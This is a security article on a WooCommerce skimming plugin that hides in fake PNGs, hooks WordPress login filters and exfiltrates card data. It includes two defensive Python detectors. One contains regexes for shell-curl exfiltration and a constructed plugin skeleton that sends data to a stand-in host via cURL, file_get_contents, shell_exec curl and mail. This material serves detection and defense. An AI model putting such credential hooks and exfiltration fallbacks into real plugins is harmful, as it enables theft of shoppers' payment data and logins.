Sophisticated Malware Targets WooCommerce Sites, Steals Credit Card Data

A malware campaign is targeting WordPress e-commerce sites that process payments through the WooCommerce plugin. First identified in August 2025, the malware combines several evasion techniques with multiple layers of credit card harvesting designed to get past conventional detection.

Malware Deployment and Operation

The malware is installed as a rogue WordPress plugin. It uses custom encryption, hides its malicious payloads inside fake image files, and opens a persistent backdoor through which the attackers can push additional code whenever they need to. Installing it requires administrator-level access, which the attackers typically obtain through stolen credentials or a vulnerability in some other installed plugin; the initial foothold, not WooCommerce itself, is the weak point.

Once active, the malware hides itself from the plugins list in the WordPress admin, which lowers the chance that an administrator notices it. It also sets tracking cookies and logs administrator activity across the compromised site. Wordfence analysts cataloged the malware after receiving a full sample on August 21, 2025, and released four detection signatures to Wordfence Premium, Care, and Response customers between August 27 and September 9, 2025. Free users received the same signatures after the standard 30-day delay.

Advanced Persistence and Command-and-Control Infrastructure

The malware builds in several layers of redundancy. It intercepts WordPress login credentials by hooking the `wp_authenticate_user` filter and the `wp_login` action, and sends what it captures to attacker-controlled servers. The `wp_authenticate_user` filter runs during authentication and receives the user object together with the password the visitor just submitted, still in cleartext, which is what makes it a convenient interception point; `wp_login` fires after a successful login and confirms which credentials actually worked.

The payload injection mechanism relies on fake PNG image files that contain JavaScript stored reversed and encoded. The skimmer is spread across three files:

1. A custom payload updated via an AJAX backdoor.

2. A dynamic payload refreshed daily.

3. A fallback static copy.
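A practical check for the "fake image" trick above is to verify that a file named as a PNG really has a PNG signature and a valid IHDR chunk, and, if it does not, to try undoing the reversal and decoding. The following is an added example written for this article; it is not Wordfence's code or the malware's. The PNG signature and IHDR layout are the real format, but the article does not say which encoding sits under the reversal, so the use of base64 here is an assumption, and the sample files are constructed inline.

```python
"""Triage a file that is named *.png but may be a reversed, encoded
JavaScript payload of the kind the article describes.

Added example for this article, not Wordfence's or the malware's code. The
PNG signature and IHDR chunk layout are the real format. The article does not
name the encoding, so base64 applied before the byte reversal is an
assumption made here; swap in another decoder if a sample proves otherwise.
"""
import base64
import binascii
import re
import struct
import zlib
from typing import Dict, Optional

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

# Tokens a checkout skimmer can hardly avoid; used only as a sanity check on
# the decoded bytes so random data that happens to be valid base64 is not
# reported as JavaScript.
JS_MARKERS = re.compile(
    rb"(addEventListener|XMLHttpRequest|fetch\(|document\.|querySelector|setTimeout)"
)


def is_real_png(data: bytes) -> bool:
    """A genuine PNG starts with the 8-byte signature and its first chunk is a
    13-byte IHDR whose CRC (over chunk type + data) verifies."""
    if not data.startswith(PNG_SIGNATURE) or len(data) < 33:
        return False
    length, ctype = struct.unpack(">I4s", data[8:16])
    if ctype != b"IHDR" or length != 13:
        return False
    crc_stored = struct.unpack(">I", data[29:33])[0]
    return crc_stored == (zlib.crc32(data[12:29]) & 0xFFFFFFFF)


def recover_reversed_js(data: bytes) -> Optional[str]:
    """Undo the reversal, base64-decode (assumed encoding) and return the text
    only if it contains JavaScript markers; otherwise None."""
    candidate = re.sub(rb"\s", b"", data[::-1])  # drop any padding whitespace
    try:
        decoded = base64.b64decode(candidate, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not JS_MARKERS.search(decoded):
        return None
    try:
        return decoded.decode("utf-8")
    except UnicodeDecodeError:
        return None


def classify(data: bytes) -> Dict[str, Optional[str]]:
    """Verdict for one file's bytes: 'png', 'reversed-js' (with payload) or
    'not-png' (wrong signature, but not the encoding assumed here)."""
    if is_real_png(data):
        return {"verdict": "png", "payload": None}
    payload = recover_reversed_js(data)
    if payload is not None:
        return {"verdict": "reversed-js", "payload": payload}
    return {"verdict": "not-png", "payload": None}


def make_minimal_png() -> bytes:
    """Constructed 1x1 greyscale PNG header (signature + valid IHDR) used as
    the benign control; no image data is needed for the header check."""
    ihdr = b"IHDR" + struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    return PNG_SIGNATURE + struct.pack(">I", 13) + ihdr + struct.pack(">I", zlib.crc32(ihdr) & 0xFFFFFFFF)


def make_fake_png() -> bytes:
    """Constructed lure: a harmless JS snippet, base64-encoded then reversed,
    as it would be stored under a .png name. Built only to exercise the check."""
    js = b"document.querySelector('#card').addEventListener('input', function () {});"
    return base64.b64encode(js)[::-1]


if __name__ == "__main__":
    for name, blob in (("real.png", make_minimal_png()), ("fake.png", make_fake_png())):
        result = classify(blob)
        print(name, "->", result["verdict"])
        if result["payload"]:
            print("   recovered:", result["payload"])
```

Run it over every `*.png` under `wp-content/plugins` and `wp-content/uploads`; a `not-png` verdict on a file served as an image is worth a manual look even when the decoder here does not recover anything, since the real campaign may use a different encoding than the one assumed.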

On WooCommerce checkout pages the JavaScript skimmer starts after a three-second delay, so that it attaches once the checkout form has been rendered rather than conflicting with WooCommerce's own scripts. It registers event listeners that capture card numbers, expiry dates and CVV values, then sends them back to the malware's PHP component on the compromised site through AJAX POST requests.

The PHP exfiltration component tries several transports in turn: native cURL, `file_get_contents`, a curl binary invoked through the shell, and finally email. Whatever extensions or outbound restrictions a given host has, at least one path usually works, which is why blocking a single transport is not a sufficient mitigation.
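The two PHP-side traits described above, login hooks that see credentials and a stack of exfiltration fallbacks, can be triaged statically before running a full scanner. The following is an added example written for this article, not one of Wordfence's signatures. The hook and function names are real WordPress and PHP identifiers; the regexes, the two constructed sample plugins, and the "login hook plus two or more transports" threshold are choices made here for illustration.

```python
"""Static triage of a WordPress plugin's PHP source for the pattern the
article describes: callbacks hooked into the login path combined with several
outbound-transfer primitives (cURL extension, file_get_contents, a shell
curl, mail).

Added example for this article, not Wordfence's signatures. The hook names
and PHP function names are real WordPress/PHP identifiers; the regexes, the
sample plugins and the "login hook plus two or more channels" threshold are
choices made here for illustration.
"""
import re
from pathlib import Path
from typing import Dict, List

# Hooks the article names as the credential-interception points. A login hook
# on its own is normal (2FA and audit-log plugins use them), so it is only
# scored together with exfiltration capability.
LOGIN_HOOKS = ("wp_authenticate_user", "wp_login")

HOOK_RE = re.compile(r"\badd_(?:action|filter)\s*\(\s*['\"](?P<hook>[a-z_]+)['\"]")

# One regex per transport the article lists. Each is deliberately narrow:
# file_get_contents is only counted with a literal URL in the same call, and a
# shell call only when 'curl' appears in its arguments.
EXFIL_CHANNELS: Dict[str, "re.Pattern[str]"] = {
    "curl_ext": re.compile(r"\bcurl_(?:init|setopt|exec)\s*\("),
    "file_get_contents_http": re.compile(r"\bfile_get_contents\s*\([^;]*https?://"),
    "shell_curl": re.compile(r"\b(?:shell_exec|exec|system|passthru|proc_open|popen)\s*\([^;]*\bcurl\b"),
    "mail": re.compile(r"\b(?:wp_mail|mail)\s*\("),
}


def scan_plugin_source(php: str) -> Dict[str, object]:
    """Return the login hooks registered, the exfil channels present, and a
    verdict: suspicious when a login hook co-occurs with two or more channels."""
    login_hooks = sorted({m.group("hook") for m in HOOK_RE.finditer(php) if m.group("hook") in LOGIN_HOOKS})
    channels = sorted(name for name, rx in EXFIL_CHANNELS.items() if rx.search(php))
    return {
        "login_hooks": login_hooks,
        "exfil_channels": channels,
        "suspicious": bool(login_hooks) and len(channels) >= 2,
    }


def scan_plugin_dir(plugin_dir: str) -> List[Dict[str, object]]:
    """Walk a plugin directory (e.g. wp-content/plugins/<slug>) and report
    only files that score as suspicious, with their paths."""
    findings = []
    for path in Path(plugin_dir).rglob("*.php"):
        result = scan_plugin_source(path.read_text(errors="replace"))
        if result["suspicious"]:
            result["file"] = str(path)
            findings.append(result)
    return findings


# Constructed sample: a skeleton of what the article describes, with no capture
# logic at all, just the hook registrations and the transport fallbacks.
SUSPICIOUS_PLUGIN = r"""<?php
/* Plugin Name: Image Optimizer Pro (constructed sample, not a real plugin) */
add_filter('wp_authenticate_user', 'iop_check', 10, 2);
add_action('wp_login', 'iop_track', 10, 2);
function iop_send($data) {
    $u = 'https://example.invalid/c';
    if (function_exists('curl_init')) { $ch = curl_init($u); curl_exec($ch); return; }
    if (@file_get_contents('https://example.invalid/c?' . $data)) { return; }
    @shell_exec('curl -s ' . escapeshellarg($u));
    @mail('x@example.invalid', 's', $data);
}
"""

# Constructed benign control: a login-notification plugin legitimately hooks
# wp_login and sends one email, but has no other transport.
BENIGN_PLUGIN = r"""<?php
/* Plugin Name: Login Notifier (constructed sample) */
add_action('wp_login', 'ln_notify', 10, 2);
function ln_notify($user_login, $user) {
    wp_mail(get_option('admin_email'), 'Login', $user_login);
}
"""

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_PLUGIN), ("benign", BENIGN_PLUGIN)):
        print(label, scan_plugin_source(src))
```

Treat a hit as a lead, not a verdict: backup and migration plugins legitimately combine several transports, and 2FA plugins legitimately hook `wp_authenticate_user`. What the scan surfaces is the combination that warrants reading the file, which is the same combination the article describes.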

Connection to Magecart Group 12

Analysis attributes the malware to Magecart Group 12, on the basis of the SMILODON identifier found in the command-and-control server URLs and coding patterns that match the group's earlier activity. The attribution is a reminder that WordPress e-commerce sites are a standing target for established card-skimming groups, and that patching and monitoring have to be continuous rather than one-off.

Implications for E-Commerce Security

The campaign poses a direct risk to merchants and their customers, because the malware captures and exfiltrates payment data systematically rather than opportunistically. Its evasion techniques (hiding from the plugin list, payloads disguised as images, several exfiltration fallbacks) make it harder to detect and remove than a simple injected script, so defenses cannot rely on signature matching alone.

Recommendations for Website Administrators

To reduce exposure to this kind of threat, website administrators should:

1. Keep plugins and themes updated: installing this malware requires administrator access, which is often gained through a vulnerable plugin, so patching closes the most common entry point.

2. Protect administrator accounts: enforce multi-factor authentication (MFA) for all administrative logins and rotate the credentials of any account that may have been exposed, since a stolen password is the other route in.

3. Audit what is actually installed: compare the plugin directories on disk under wp-content/plugins against the plugins shown in the admin panel, because this malware hides itself from that list, and review any image files inside plugin directories that do not parse as valid images.

4. Monitor for unusual activity: review web server and WordPress logs for unexpected AJAX endpoints, new administrator logins, and file changes, and watch for outbound connections from the web server to unfamiliar hosts.

5. Use a web application firewall (WAF): a WAF with current signatures can block both the exploitation attempts used to gain access and the skimmer's exfiltration traffic.

Taken together, these measures raise the cost of getting such a plugin installed in the first place and shorten the time it can run undetected.